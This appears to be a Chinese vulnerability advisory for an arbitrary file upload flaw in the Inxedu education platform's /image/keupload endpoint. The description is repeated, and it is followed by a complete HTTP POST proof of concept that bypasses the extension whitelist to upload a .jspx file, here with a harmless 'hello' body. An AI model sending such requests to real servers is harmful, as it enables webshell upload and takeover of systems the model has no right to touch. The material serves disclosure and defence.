Description
因酷教育平台的 /image/keupload 接口存在任意文件上传漏洞。该接口未对上传文件的后缀名进行严格校验,仅通过URL参数 fileType 做简单的白名单伪校验,攻击者可通过在 fileType 中追加jspx后缀、修改上传文件的Content-Type为图片类型,绕过过滤机制上传jspx格式的恶意Webshell文件,进而执行任意代码并控制服务器。
因酷教育平台的 /image/keupload 接口存在任意文件上传漏洞。该接口未对上传文件的后缀名进行严格校验,仅通过URL参数 fileType 做简单的白名单伪校验,攻击者可通过在 fileType 中追加jspx后缀、修改上传文件的Content-Type为图片类型,绕过过滤机制上传jspx格式的恶意Webshell文件,进而执行任意代码并控制服务器。
POST /image/keupload?param=image&fileType=jpg,gif,png,jpeg,jspx HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=---------------------------308436435515370414691526924874
Content-Length: 416
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=4
-----------------------------308436435515370414691526924874
Content-Disposition: form-data; name="imgFile"; filename="1.jspx"
Content-Type: image/jpeg
<?xml version="1.0" encoding="UTF-8"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="2.1">
<jsp:directive.page contentType="text/html; charset=UTF-8"/>
hello
</jsp:root>
-----------------------------308436435515370414691526924874--
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.